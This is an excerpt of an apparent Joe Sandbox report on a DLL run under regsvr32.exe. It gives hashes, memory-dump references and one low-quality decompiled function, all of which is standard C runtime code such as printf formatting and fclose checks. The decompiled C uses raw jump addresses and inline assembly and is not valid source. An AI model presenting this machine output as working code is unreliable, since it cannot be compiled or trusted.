                                    • Opcode ID: 5d60d57c9e58d07f7621284f5e9f8ee1c279b3f05538a913626922df64b73307
                                    • Instruction ID: d8e48e7000e52547e61d66b201573bb281919b8ac3286b667feec84700a76b7c
                                    • Opcode Fuzzy Hash: 5d60d57c9e58d07f7621284f5e9f8ee1c279b3f05538a913626922df64b73307
                                    • Instruction Fuzzy Hash: 60A11E36A18A8581EB908F49E4853BEA3E0F3C4B54F665036EA8E477B5CFBED445C740
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D32772 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 166COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: ("Buffer too small", 0)$_vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                    • API String ID: 2123368286-3717698799
                                    • Opcode ID: 9007319e5b81e0e19641b6dff6978a626c4b249898d68e368399ad5d9614f895
                                    • Instruction ID: f46ca83dba6c4e2be9a9571e906a820c6a216ec021220a7175966cdc7e38441f
                                    • Opcode Fuzzy Hash: 9007319e5b81e0e19641b6dff6978a626c4b249898d68e368399ad5d9614f895
                                    • Instruction Fuzzy Hash: EB810D31A1DB8686DAB08B29E84476E73E0F385765F204225E6ED437E9DF3DD445CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3C719 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 93COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 20%
                                    			E000007FE7FEF9D3C719(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
				signed int _t212;
				signed char _t217;
				intOrPtr _t252;
				signed int _t327;
				signed int _t328;
				signed long long _t331;
				intOrPtr* _t354;
				signed long long _t379;

				_t327 = __rax;
				_a708 = 0x27;
				_a72 = 0x10;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c754;
				_a84 = 0x30;
				_a85 = _a708 + 0x51;
				_a92 = 2;
				_a72 = 8;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c777;
				asm("bts eax, 0x9");
				if ((_a80 & 0x00008000) == 0) goto 0xf9d3c79e;
				E000007FE7FEF9D31EA0( &_a1112);
				_a824 = _t327;
				goto 0xf9d3c84b;
				if ((_a80 & 0x00001000) == 0) goto 0xf9d3c7c5;
				E000007FE7FEF9D31EA0( &_a1112);
				_a824 = _t327;
				goto 0xf9d3c84b;
				if ((_a80 & 0x00000020) == 0) goto 0xf9d3c810;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c7f6;
				_t328 = E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t328;
				goto 0xf9d3c80e;
				E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t328;
				goto 0xf9d3c84b;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c834;
				E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t328;
				goto 0xf9d3c84b;
				E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t328;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c882;
				if (_a824 >= 0) goto 0xf9d3c882;
				_a832 =  ~_a824;
				asm("bts eax, 0x8");
				goto 0xf9d3c892;
				_t331 = _a824;
				_a832 = _t331;
				if ((_a80 & 0x00008000) != 0) goto 0xf9d3c8c7;
				if ((_a80 & 0x00001000) != 0) goto 0xf9d3c8c7;
				_a832 = _a832 & _t331;
				if (_a116 >= 0) goto 0xf9d3c8d8;
				_a116 = 1;
				goto 0xf9d3c8f5;
				_a80 = _a80 & 0xfffffff7;
				if (_a116 - 0x200 <= 0) goto 0xf9d3c8f5;
				_a116 = 0x200;
				if (_a832 != 0) goto 0xf9d3c908;
				_a92 = 0;
				_a64 =  &_a687;
				_t212 = _a116;
				_a116 = _a116 - 1;
				if (_t212 > 0) goto 0xf9d3c936;
				if (_a832 == 0) goto 0xf9d3c9d3;
				_a1040 = _a72;
				_a816 = _t212 / _a1040 + 0x30;
				_a1048 = _a72;
				if (_a816 - 0x39 <= 0) goto 0xf9d3c9b2;
				_t217 = _a816 + _a708;
				_a816 = _t217;
				 *_a64 = _a816 & 0x000000ff;
				_a64 = _a64 - 1;
				goto 0xf9d3c915;
				_a104 = _t217;
				_a64 = _a64 + 1;
				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ca31;
				if (_a104 == 0) goto 0xf9d3ca12;
				if ( *_a64 == 0x30) goto 0xf9d3ca31;
				_a64 = _a64 - 1;
				 *_a64 = 0x30;
				_a104 = _a104 + 1;
				if (_a108 != 0) goto 0xf9d3cc6e;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ca95;
				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ca63;
				_a84 = 0x2d;
				_a92 = 1;
				goto 0xf9d3ca95;
				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ca7d;
				_a84 = 0x2b;
				_a92 = 1;
				goto 0xf9d3ca95;
				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ca95;
				_a84 = 0x20;
				_a92 = 1;
				_a840 = _a88 - _a104 - _a92;
				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3cad5;
				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
				E000007FE7FEF9D3CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
				if ((_a80 & 0x00000008) == 0) goto 0xf9d3cb27;
				if ((_a80 & 0x00000004) != 0) goto 0xf9d3cb27;
				E000007FE7FEF9D3CF10(0x30, _a840, _a1088,  &_a688);
				if (_a76 == 0) goto 0xf9d3cc1d;
				if (_a104 <= 0) goto 0xf9d3cc1d;
				_a872 = 0;
				_a848 = _a64;
				_a856 = _a104;
				_a856 = _a856 - 1;
				if (_a856 == 0) goto 0xf9d3cc1b;
				_a1056 =  *_a848 & 0x0000ffff;
				r9d = _a1056 & 0x0000ffff;
				r8d = 6;
				_a872 = E000007FE7FEF9D3B530( &_a860,  &_a864, _a1088);
				_a848 =  &(_a848[1]);
				if (_a872 != 0) goto 0xf9d3cbe5;
				if (_a860 != 0) goto 0xf9d3cbf2;
				_a688 = 0xffffffff;
				goto 0xf9d3cc1b;
				E000007FE7FEF9D3CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
				goto 0xf9d3cb60;
				goto 0xf9d3cc3b;
				E000007FE7FEF9D3CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
				if (_a688 < 0) goto 0xf9d3cc6e;
				if ((_a80 & 0x00000004) == 0) goto 0xf9d3cc6e;
				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
				if (_a96 == 0) goto 0xf9d3cc8e;
				0xf9d25330();
				_a96 = 0;
				goto 0xf9d3b99c;
				if (_a704 == 0) goto 0xf9d3ccb4;
				if (_a704 == 7) goto 0xf9d3ccb4;
				_a1060 = 0;
				goto 0xf9d3ccbf;
				_a1060 = 1;
				_t252 = _a1060;
				_a876 = _t252;
				if (_a876 != 0) goto 0xf9d3cd05;
				_t354 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
				_a32 = _t354;
				r9d = 0;
				r8d = 0x8f5;
				0xf9d2b3b0();
				if (_t252 != 1) goto 0xf9d3cd05;
				asm("int3");
				if (_a876 != 0) goto 0xf9d3cd61;
				0xf9d2ab30();
				 *_t354 = 0x16;
				_a32 = 0;
				r9d = 0x8f5;
				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
				_a912 = 0xffffffff;
				E000007FE7FEF9D26800( &_a120);
				goto 0xf9d3cd80;
				_a916 = _a688;
				E000007FE7FEF9D26800( &_a120);
				return E000007FE7FEF9D23280(_a916, 2, 2, _a1064 ^ _t379, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
			}











                                    0x7fef9d3c719
                                    0x7fef9d3c719
                                    0x7fef9d3c724
                                    0x7fef9d3c737
                                    0x7fef9d3c739
                                    0x7fef9d3c748
                                    0x7fef9d3c74c
                                    0x7fef9d3c756
                                    0x7fef9d3c769
                                    0x7fef9d3c76f
                                    0x7fef9d3c782
                                    0x7fef9d3c78c
                                    0x7fef9d3c791
                                    0x7fef9d3c799
                                    0x7fef9d3c7a9
                                    0x7fef9d3c7b3
                                    0x7fef9d3c7b8
                                    0x7fef9d3c7c0
                                    0x7fef9d3c7ce
                                    0x7fef9d3c7d9
                                    0x7fef9d3c7e8
                                    0x7fef9d3c7ec
                                    0x7fef9d3c7f4
                                    0x7fef9d3c7fe
                                    0x7fef9d3c806
                                    0x7fef9d3c80e
                                    0x7fef9d3c819
                                    0x7fef9d3c823
                                    0x7fef9d3c82a
                                    0x7fef9d3c832
                                    0x7fef9d3c83c
                                    0x7fef9d3c843
                                    0x7fef9d3c854
                                    0x7fef9d3c85f
                                    0x7fef9d3c86c
                                    0x7fef9d3c878
                                    0x7fef9d3c880
                                    0x7fef9d3c882
                                    0x7fef9d3c88a
                                    0x7fef9d3c89d
                                    0x7fef9d3c8aa
                                    0x7fef9d3c8bf
                                    0x7fef9d3c8cc
                                    0x7fef9d3c8ce
                                    0x7fef9d3c8d6
                                    0x7fef9d3c8df
                                    0x7fef9d3c8eb
                                    0x7fef9d3c8ed
                                    0x7fef9d3c8fe
                                    0x7fef9d3c900
                                    0x7fef9d3c910
                                    0x7fef9d3c915
                                    0x7fef9d3c91f
                                    0x7fef9d3c925
                                    0x7fef9d3c930
                                    0x7fef9d3c93b
                                    0x7fef9d3c95e
                                    0x7fef9d3c96a
                                    0x7fef9d3c997
                                    0x7fef9d3c9a9
                                    0x7fef9d3c9ab
                                    0x7fef9d3c9bf
                                    0x7fef9d3c9c9
                                    0x7fef9d3c9ce
                                    0x7fef9d3c9e0
                                    0x7fef9d3c9ec
                                    0x7fef9d3c9fc
                                    0x7fef9d3ca03
                                    0x7fef9d3ca10
                                    0x7fef9d3ca1a
                                    0x7fef9d3ca24
                                    0x7fef9d3ca2d
                                    0x7fef9d3ca36
                                    0x7fef9d3ca45
                                    0x7fef9d3ca52
                                    0x7fef9d3ca54
                                    0x7fef9d3ca59
                                    0x7fef9d3ca61
                                    0x7fef9d3ca6c
                                    0x7fef9d3ca6e
                                    0x7fef9d3ca73
                                    0x7fef9d3ca7b
                                    0x7fef9d3ca86
                                    0x7fef9d3ca88
                                    0x7fef9d3ca8d
                                    0x7fef9d3caa5
                                    0x7fef9d3cab5
                                    0x7fef9d3cad0
                                    0x7fef9d3caee
                                    0x7fef9d3cafc
                                    0x7fef9d3cb07
                                    0x7fef9d3cb22
                                    0x7fef9d3cb2c
                                    0x7fef9d3cb37
                                    0x7fef9d3cb3d
                                    0x7fef9d3cb4d
                                    0x7fef9d3cb59
                                    0x7fef9d3cb70
                                    0x7fef9d3cb79
                                    0x7fef9d3cb8a
                                    0x7fef9d3cb92
                                    0x7fef9d3cb9b
                                    0x7fef9d3cbb6
                                    0x7fef9d3cbc9
                                    0x7fef9d3cbd9
                                    0x7fef9d3cbe3
                                    0x7fef9d3cbe5
                                    0x7fef9d3cbf0
                                    0x7fef9d3cc11
                                    0x7fef9d3cc16
                                    0x7fef9d3cc1b
                                    0x7fef9d3cc36
                                    0x7fef9d3cc43
                                    0x7fef9d3cc4e
                                    0x7fef9d3cc69
                                    0x7fef9d3cc74
                                    0x7fef9d3cc80
                                    0x7fef9d3cc85
                                    0x7fef9d3cc8e
                                    0x7fef9d3cc9b
                                    0x7fef9d3cca5
                                    0x7fef9d3cca7
                                    0x7fef9d3ccb2
                                    0x7fef9d3ccb4
                                    0x7fef9d3ccbf
                                    0x7fef9d3ccc6
                                    0x7fef9d3ccd5
                                    0x7fef9d3ccd7
                                    0x7fef9d3ccde
                                    0x7fef9d3cce3
                                    0x7fef9d3cce6
                                    0x7fef9d3ccf8
                                    0x7fef9d3cd00
                                    0x7fef9d3cd02
                                    0x7fef9d3cd0d
                                    0x7fef9d3cd0f
                                    0x7fef9d3cd14
                                    0x7fef9d3cd1a
                                    0x7fef9d3cd23
                                    0x7fef9d3cd3e
                                    0x7fef9d3cd43
                                    0x7fef9d3cd53
                                    0x7fef9d3cd5f
                                    0x7fef9d3cd68
                                    0x7fef9d3cd74
                                    0x7fef9d3cd97

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: get_int64_arg
                                    • String ID: '$0$9
                                    • API String ID: 1967237116-269856862
                                    • Opcode ID: 83c439eea7fc9ce93bcb821b911d608e7d80de2d13083439c5735137d4fc31ad
                                    • Instruction ID: b3eda79bc04a60fb7ee4a4011f7c31915f3bf9e4e3688118cbdbb277fe6e384d
                                    • Opcode Fuzzy Hash: 83c439eea7fc9ce93bcb821b911d608e7d80de2d13083439c5735137d4fc31ad
                                    • Instruction Fuzzy Hash: 0D41B47260DAC187E7B58B19E8957AEB7E4F385791F100125EAC886B98DB7DE640CF00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D35260 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Frame$CreateDestroyedExceptionFindInfoObjectUnlink
                                    • String ID: csm
                                    • API String ID: 2005287440-1018135373
                                    • Opcode ID: 4c556ceed80f2aba1954f9041ed191ad0fbab56fa1f8ad9f2457e70616e7d401
                                    • Instruction ID: 0432dbe60f42fc154ce83aeddd16286c3d94edaaa77ff7db33c77853d76fe5a2
                                    • Opcode Fuzzy Hash: 4c556ceed80f2aba1954f9041ed191ad0fbab56fa1f8ad9f2457e70616e7d401
                                    • Instruction Fuzzy Hash: FB51A836608B8682DAA09B1AF49076E77E0F3C4B91F615125EBCD47BB5DF3AD444CB40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D28040 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 80COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: FileModuleName__initmbctable
                                    • String ID: C:\Windows\System32\regsvr32.exe$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdargv.c
                                    • API String ID: 3548084100-1254873407
                                    • Opcode ID: b22e410beffd46978b7d2afc3cd069083579849eea9e12d44582c014dad21e95
                                    • Instruction ID: c1f8112261206beaa0fda4b6683aef0dc38e0cb6ee3d4e311a15053ab41967b3
                                    • Opcode Fuzzy Hash: b22e410beffd46978b7d2afc3cd069083579849eea9e12d44582c014dad21e95
                                    • Instruction Fuzzy Hash: 47411C21A19A8281EA90CB19EC8136E77A0F7857A5F614626E6EE43BF4DF3ED144C701
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D328E8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: ("Buffer too small", 0)$_vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                    • API String ID: 2123368286-3717698799
                                    • Opcode ID: 902fc8e7192f88527d8aa4075598999d81e9371814558b5bb1293b80f5ddf804
                                    • Instruction ID: 7c05dd3e5b110925f13ad37327732dcd8002d47ee9d5ea83dce110c9ec813185
                                    • Opcode Fuzzy Hash: 902fc8e7192f88527d8aa4075598999d81e9371814558b5bb1293b80f5ddf804
                                    • Instruction Fuzzy Hash: B6412931E1C7868AEAB08B24E8447AE62E0F385365F604335D6ED427F5DB3EE444CB11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D27816 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: CountCriticalFileInitializeSectionSpinType_calloc_dbg_calloc_dbg_impl
                                    • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\ioinit.c
                                    • API String ID: 2306298712-3864165772
                                    • Opcode ID: f14d95e79dbe0c44160fd2e577ceb585774a34057722467733e8b2231de90ff9
                                    • Instruction ID: 3bda70979e2781d9fddcfcf2e5c0164bb67a8e60ab66e06e656835f18ed7d390
                                    • Opcode Fuzzy Hash: f14d95e79dbe0c44160fd2e577ceb585774a34057722467733e8b2231de90ff9
                                    • Instruction Fuzzy Hash: 3A313D72A09BC585E7B08B19E84076E73E1F385764F618225CAED877E4DB3DE405CB11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D37F0E Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: _wcstombs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c
                                    • API String ID: 2123368286-2562677240
                                    • Opcode ID: f1a9f826516545701b922f50b6ebdc9d8be9d112825cbb7a30042366d5f9c4a9
                                    • Instruction ID: 93e11cc603146a2a446790da906b27a7af07cbd58e629032b7549c60c7683809
                                    • Opcode Fuzzy Hash: f1a9f826516545701b922f50b6ebdc9d8be9d112825cbb7a30042366d5f9c4a9
                                    • Instruction Fuzzy Hash: 4A311632A0DB8685EAB09B15E8407AEB7E1F385390F204225D6DD03BE8DB7ED444CB02
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D40680 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter$__doserrno
                                    • String ID: (str != NULL)$_fclose_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fclose.c
                                    • API String ID: 1181141450-2845860089
                                    • Opcode ID: 60dcfdadd0e03516a84dc335c67980ba4999d51805a5974115e67aa140ed36a2
                                    • Instruction ID: 33c12517d78d4ed4392c0426817be49b117e9f4526535de823d8000f08003729
                                    • Opcode Fuzzy Hash: 60dcfdadd0e03516a84dc335c67980ba4999d51805a5974115e67aa140ed36a2
                                    • Instruction Fuzzy Hash: 81315A36A28A4686E7909B18E88476E77E0F380794F205125F6CE47BF5CB7ED841CF42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3AB10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 57COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: (fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_isatty$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\isatty.c
                                    • API String ID: 2123368286-160817255
                                    • Opcode ID: eccc8fed36cae0d9a6e14cbb0507e08d02c226084f69b474f0b5454228c7b857
                                    • Instruction ID: 5484b95fc3e7d8404cd289b1f0f4537a60eed7c4b35d0a2d8431c0a05804e9c3
                                    • Opcode Fuzzy Hash: eccc8fed36cae0d9a6e14cbb0507e08d02c226084f69b474f0b5454228c7b857
                                    • Instruction Fuzzy Hash: F121AE71B2C6428AE7D89B24EC8476DB3E1F380356F609635E1DD476E4D77ED4408B00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D40580 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 54COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: (stream != NULL)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fclose.c$fclose
                                    • API String ID: 2123368286-3409824857
                                    • Opcode ID: d31558689191b30e1debc2aa339dabcf4ed505ad636b5f29a69950b4dd90694d
                                    • Instruction ID: f9aafbf46e1760e7e33942ab5f057e126490a1467b3f18266bcf817366ff1fd0
                                    • Opcode Fuzzy Hash: d31558689191b30e1debc2aa339dabcf4ed505ad636b5f29a69950b4dd90694d
                                    • Instruction Fuzzy Hash: 5B214C72A1D64286EB909F58E88476E77E0F380394F605525E6CE476E4CBBED444CF42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D2C170 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~_
                                    • String ID: (unsigned)(c + 1) <= 256$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\isctype.c
                                    • API String ID: 1901436342-3621827421
                                    • Opcode ID: 291659c115524f578e2ce7e37289a3f2ddc7b5bd59cb83b4eaeda8d1fa0b4c89
                                    • Instruction ID: 30d3218aedea65180b246fff2bb8bf0e075bfccfde79c9cac609a79bfc2ef9ad
                                    • Opcode Fuzzy Hash: 291659c115524f578e2ce7e37289a3f2ddc7b5bd59cb83b4eaeda8d1fa0b4c89
                                    • Instruction Fuzzy Hash: 4D210132918A8186E790DB24E8817AEB7E0F7C4780F614022E7DD83AB9DB7DD954CB40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

